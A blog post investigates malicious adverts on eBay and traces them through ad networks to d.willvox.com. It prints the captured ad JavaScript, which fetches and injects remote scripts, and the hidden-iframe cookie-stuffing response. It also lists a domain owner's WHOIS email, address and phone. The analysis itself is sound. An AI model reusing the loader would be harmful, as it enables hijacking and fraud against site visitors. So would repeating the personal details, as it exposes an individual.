Rogue adverts redirecting ebay visitors off-site. (d.willvox.com and www.gamiss.com/?lkid=13368106)

UPDATE: THE SAME JUNK STARTED PLAYING MUSIC! see the new article

ebay gamiss advert page

Today while browsing eBay I was taken off the eBay site several times and onto “www.gamiss.com/?lkid=13368106”. I did click click or even mouse over any advert.

I’ve seen this happen about 3 or so times in the past year with eBay but today I had time to investigate and trace what is going on.

It looks like eBay are sending visitors to an advertising partner called “pubmatic.com” who are in turn then sending the visitor to “mathtag.com”.. who are then sending advert javascript with content referencing “d.willvox.com” and “zaful.com”

ebay request 1

ebay request 2

ebay request 3

ebay request 4

ebay request 5

The most interesting parts of the exchange are….

pubmatic.com returning the following Javascript:

https://tags.mathtag.com/notify/js?exch=pub&id=5aW95q2jLzE0LyAvTTJSaU9XVTNOR1F0TlRnME5TMDROV1V5TFRBd01EQXRNREF3TURBd01EQXdNREF3LzIwMDUzNzQ4NjYyMzQ4OTkxODMvNTM0NDE2My8yOTAzNjMxLzMvTkNYN2Nkai1NMnNVcXBoLVF2b3pkMnBkaHhDbEdlZUg4R2pkdVpSOXRrcy8xLzMvMTUxOTY2NjIwMC8wLzU3OTM1Ni8xMzU5MTA5NjMyLzIwMTAwMi80NDM4MDIvMS8wLzAvTURBd01EQXdNREF0TURBd01DMHdNREF3TFRBd01EQXRNREF3TURBd01EQXdNREF3LzAvMC8wLzAvMC8yMDA1Mzc0ODY2MjM0ODk5MTgzL3pyaC8/NVxI2XsTKGxAGahgZIG3pD1Qquo&sid=2903631&cid=5344163&nodeid=1135&price=0.091&group=eu&auctionid=2005374866234899183&bp=a_ajbcci&3pck=http://clicktrack.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=JnB1YklkPTE1NTIxMiZzaXRlSWQ9MTU1MjEzJmFkSWQ9OTUyMDE1JmthZHNpemVpZD0yMjUmdGxkSWQ9MzU0MDkzODUmY2FtcGFpZ25JZD0xNjczNSZjcmVhdGl2ZUlkPTAmYWRTZXJ2ZXJJZD0yNDMmaW1waWQ9RTQ4OTczRjYtREM2Ri00ODMyLTg1NkUtNjM5NkNCQTk1QzE4JnBhc3NiYWNrPTA=_url=

They reference tags.mathtag.com.. something to do with Math Media. An advertising agency or system.

Mathtag then send the following javascript:


<div class="script">
    
        ! function() {
            var e, t = "https://d.willvox.com",
                n = "5a40ca64fc0c4d14be22ffa8",
                r = {},
                o = {
                    10: "2005374866234899183",
                    9: "[SUBID]",
                    8: "https%3A//ebayadvertising.co.uk/",
                    7: "[LOCATION_LAT]",
                    6: "[LOCATION_LONG]",
                    5: "[DEVICEID]"
                },
                a = {
                    10: "2903631",
                    9: "5344163",
                    8: "[CUSTOM3]",
                    7: "[CUSTOM4]",
                    6: "[CUSTOM5]",
                    5: "[CUSTOM6]"
                },
                c = {
                    10: "[APP_NAME]",
                    9: "[IDFA]",
                    8: "[AID]"
                };
            try {
                for (var d = 10; d > 4;) r["z" + d] = o[d], r["c" + d] = a[d], d--;
                for (d = 10; d > 7;) r["a" + d] = c[d], d--;
                var i = m(r);

                function m(e) {
                    var t, n;
                    for (var r in "object" == typeof e && (t = ""), e) e.hasOwnProperty(r) && (t = t + "&" + r + "=" + (n = e[r], encodeURIComponent(n)));
                    return t
                }

                function p() {
                    if (window.top) return window.top;
                    for (var e = window; e.parent;) e = e.parent;
                    return e
                }

                function s() {
                    try {
                        return p().document.location.href
                    } catch (e) {
                        try {
                            return p().location.hostname
                        } catch (e) {
                            return function() {
                                try {
                                    var e = window.parent.location.ancestorOrigins;
                                    if (e && e.length >= 1) return e[e.length - 1]
                                } catch (e) {}
                            }()
                        }
                    }
                }

                function l(e) {
                    if ("" !== e.responseText) {
                        var t, n = document.createElement("div");
                        n.innerHTML = "

<div>" + e.responseText + "</div>

", n = n.firstChild, document.body.appendChild(n);
                        var r = document.getElementById("adder-inisder"),
                            o = n.getElementsByTagName("script");
                        if (o.length > 0)
                            for (var a = 0; a < o.length; ++a) {
                                u(o[a])
                            }
                        r.parentNode.appendChild(n), r.parentNode.removeChild(r)
                    } else {
                        (t = document.createElement("div")).className = "ad-serve-image", t.innerHTML = '<a>  <img src="https://d.willvox.com/ad/zaful.jpg" height="250" width="300"> </a>', document.getElementById("adder-inisder").parentNode.appendChild(t);
                        var c = document.getElementById("adder-inisder");
                        c.parentNode.removeChild(c)
                    }
                }

                function u(e) {
                    var t = document.createElement("script");
                    e && (e.text ? t.text = e.text : e.src && (t.src = e.src)), e.parentNode.appendChild(t), e.parentNode.removeChild(e)
                }

                function h() {
                    if (200 !== this.status) {
                        if ("complete" !== document.readyState) var e = setInterval(function() {
                            "complete" === document.readyState && (clearInterval(e), f())
                        }, 140);
                        "complete" === document.readyState ? f() : l(this)
                    } else l(this)
                }

                function f() {
                    try {
                        e = !(window.self === window.top)
                    } catch (t) {
                        e = !0
                    }
                    var r = t.concat("/?pid=") + n,
                        o = {};
                    e ? (o.mt = function() {
                        try {
                            return p().document.URL
                        } catch (e) {
                            try {
                                return p().frames[0].document.referrer
                            } catch (e) {}
                        }
                    }() || "", o.hn = s() || "") : (o.hn = window.location.hostname, o.mt = function() {
                        try {
                            for (var e = document.getElementsByTagName("meta"), t = 0; t <span id="mce_SELREST_start" style="overflow:hidden;line-height:0;"></span>< e.length; t++) {
                                var n = e[t];
                                if ("og:url" === n.getAttribute.property) return n.getAttribute("content")
                            }
                        } catch (e) {}
                    }() || ""), r += m(o), r += i;
                    var a = new XMLHttpRequest;
                    a.onload = h, a.open("GET", r), a.send()
                }
                f()
            } catch (e) {
                document.getElementById("adder-inisder").parentNode.removeChild(zpscript)
            }
        }();

This code looks like it is supposed to be showing the following advert: https://d.willvox.com/ad/zaful.jpg possibly if the browser doesn’t support JavaScript(?) but it also triggers yet another request to https://d.willvox.com (see the last screenshot) which responds with.

<a href="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600" target="_parent"><img width="725" height="90" src="https://ae01.alicdn.com/kf/HTB1VhqnX1GSBuNjSspb763iipXaZ/EN_728_90.png"/></a>
<img width="725" height="90" src="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600&af=[URL]&cn=[CUSTOM1]&cv=[CUSTOM2]&dp=[CB]" style="display:none;">
<iframe src="https://www.gearbest.com/promotion-8-march-special-1216.html?lkid=13364449" style="display: none"></iframe>
<iframe src="https://www.zaful.com/m-promotion-active-valentines-sale.html?innerid=35&lkid=13266105" style="display:none"></iframe>
<iframe src="https://www.gamiss.com/?lkid=13368106" style="display:none"></iframe>
<iframe src="https://www.rosegal.com/promotion-christmas-sale.html?lkid=12369082" style="display:none"></iframe>

And the deed is done. Something within the iframe for gamiss hijacks the entire page and takes you off ebay. It looks like an attempt to deploy affiliate cookies to people so that when, and if, they visit the websites referenced above and make a purchase – the person behind the junk adverts gets a kickback.

Piss poor vetting and subsequent takedown of rogue adverts. This has been a problem for at least a couple of days at this point. eBay is what I’ve seen people refer to as a “dumpster fire”. Lacking competition and drive to do things right.

Looking into the domain involved more (d.willvox.com) it seems that the following person is the owner of the domain:

Email maheshrajiv@gmail.com 
Name Thevar
Organization Mahesh
Street Address
Matunga
Mumbai
Maharashtra
400019
India

Phone 919029929719

They also own other similarly named and fishy looking domains:

addtodeal.com
alfaimpl.com
ceworldwide.in
funderspool.com
funderspool.in
grannyssecretrecipes.com
iafm.in
indiaftv.com
indiaftv.in
indianfashion.tv
internationalmediaplanet.com
juiceelement.in
mychildmyworld.com
panchakarma.online
runwayagency.com
saiproductionsbudapest.com
shivgarjana.in
squareroof.com
termzero.com
themostmodels.com
v7remedy.com
visioncorpltd.com
visioncorptv.com
visioncorptv.net
visionre.in
wildvox.com
This entry was posted in Uncategorized. Bookmark the permalink.

1 Response to Rogue adverts redirecting ebay visitors off-site. (d.willvox.com and www.gamiss.com/?lkid=13368106)

  1. Pingback: eBay: zaful advert playing music automatically (another d.willvox.com malicious advert) | thecomputerperson

Comment on this topic

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s